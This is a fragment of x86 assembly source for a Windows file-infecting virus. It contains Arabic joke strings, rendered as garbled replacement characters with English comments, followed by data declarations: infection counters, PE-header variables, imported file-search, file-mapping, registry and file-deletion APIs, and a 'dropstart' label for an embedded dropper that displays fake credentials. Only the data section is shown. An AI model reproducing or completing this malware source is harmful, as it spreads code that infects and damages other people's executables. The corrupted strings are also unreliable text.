@9 db "<22><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0
|
||
; String on string and thread on thread
|
||
@10 db "! <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>",0
|
||
; Give me my liberty, free my hands !
|
||
@11 db "! <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0
|
||
; El-Lembii
|
||
@12 db "! <20><> <20><> <20><><EFBFBD><EFBFBD> , <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD>",0
|
||
; No Bouha, you can do everything but this !
|
||
@13 db "! <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0
|
||
; Oh, you sexy smelling butter boxes !
|
||
@14 db "<22><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>",0
|
||
; Gamal el dawly calls for resolving the football federation
|
||
@15 db "<22><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ",0
|
||
; Gamal el dawly threatens Israel with the nuclear weapon !
|
||
@16 db "<22><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> ",0
|
||
; If El ahly is iron, zamalek would melt it !
|
||
@17 db "! <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0
|
||
; Please mohsen, if daddy finds out about it he will cut us into peaces !
|
||
@18 db "! <20><> <20><><EFBFBD>, <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>... <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0
|
||
; Son, it's your time to know the truth, you were born by artificial
|
||
; fertilization !
|
||
@19 db "<22> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20>",0
|
||
; UGH ! who is knocking in such an hour ?
|
||
@20 db "! <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>",0
|
||
; Come on! I told you i am in need of sleep
|
||
|
||
|
||
advapi32 dd ?
|
||
_RegSetValueExA dd ?
|
||
_RegOpenKeyExA dd ?
|
||
_RegQueryValueExA dd ?
|
||
_RegCloseKey dd ?
|
||
HandleOpenedKey dd 0
|
||
val2 db 0,0
|
||
|
||
buff_ dd 60h
|
||
buff db 60h dup (0)
|
||
|
||
buff2_ dd 30h
|
||
buff2 db 30h dup (0)
|
||
|
||
haddress dd ?
|
||
hmap dd ?
|
||
hfile dd ?
|
||
ThreadID3 dd ?
|
||
|
||
olddir db 128 dup (0h)
|
||
currdir db 128 dup (1h)
|
||
|
||
st SYSTEMTIME ?
|
||
wfd WIN32_FIND_DATA ?
|
||
search_handle dd ?
|
||
search_handle2 dd ?
|
||
|
||
ori_attrib dd ?
|
||
infect_counter dd ?
|
||
|
||
haddress2 dd ?
|
||
hmap2 dd ?
|
||
hfile2 dd ?
|
||
user32 dd ?
|
||
_MessageBoxA dd ?
|
||
itd_va dd ?
|
||
fsize_high dd ?
|
||
new_filesize dd ?
|
||
file_handle dd ?
|
||
map_handle dd ?
|
||
map_address dd ?
|
||
pe_header dd ?
|
||
last_entry dd ?
|
||
file_align dd ?
|
||
tmp_eip dd ?
|
||
size_rawdata dd ?
|
||
|
||
kernel dd kernel_
|
||
infections dd 00000000h
|
||
NewSize dd 00000000h
|
||
SearchHandle dd 00000000h
|
||
FileHandle dd 00000000h
|
||
MapHandle dd 00000000h
|
||
MapAddress dd 00000000h
|
||
AddressTableVA dd 00000000h
|
||
NameTableVA dd 00000000h
|
||
OrdinalTableVA dd 00000000h
|
||
Counter dw 0000h
|
||
|
||
@@Offsetz label byte
|
||
_FindFirstFileA dd 00000000h
|
||
_FindNextFileA dd 00000000h
|
||
_FindClose dd 00000000h
|
||
_CreateFileA dd 00000000h
|
||
_DeleteFileA dd 00000000h
|
||
_SetFilePointer dd 00000000h
|
||
_SetFileAttributesA dd 00000000h
|
||
_CloseHandle dd 00000000h
|
||
_GetCurrentDirectoryA dd 00000000h
|
||
_SetCurrentDirectoryA dd 00000000h
|
||
_GetWindowsDirectoryA dd 00000000h
|
||
_GetSystemDirectoryA dd 00000000h
|
||
_CreateFileMappingA dd 00000000h
|
||
_MapViewOfFile dd 00000000h
|
||
_UnmapViewOfFile dd 00000000h
|
||
_SetEndOfFile dd 00000000h
|
||
_GetProcAddress dd 00000000h
|
||
_LoadLibraryA dd 00000000h
|
||
_GetSystemTime dd 00000000h
|
||
_GetModuleHandleA dd 00000000h
|
||
_WriteFile dd 00000000h
|
||
_GetFileSize dd 00000000h
|
||
_GetFileAttributesA dd 00000000h
|
||
_VirtualAlloc dd 00000000h
|
||
_Sleep dd 00000000h
|
||
_CreateThread dd 00000000h
|
||
_SetThreadPriority dd 00000000h
|
||
_ResumeThread dd 00000000h
|
||
_lstrcmp dd 00000000h
|
||
_lstrcpy dd 00000000h
|
||
_GetSystemDefaultLCID dd 00000000h
|
||
_SetFileTime dd 00000000h
|
||
|
||
|
||
; This is a compressed exe file, it will display a faked username
|
||
; and password for bangbus when run, included is it's assembly
|
||
|
||
dropstart:
|
||
db |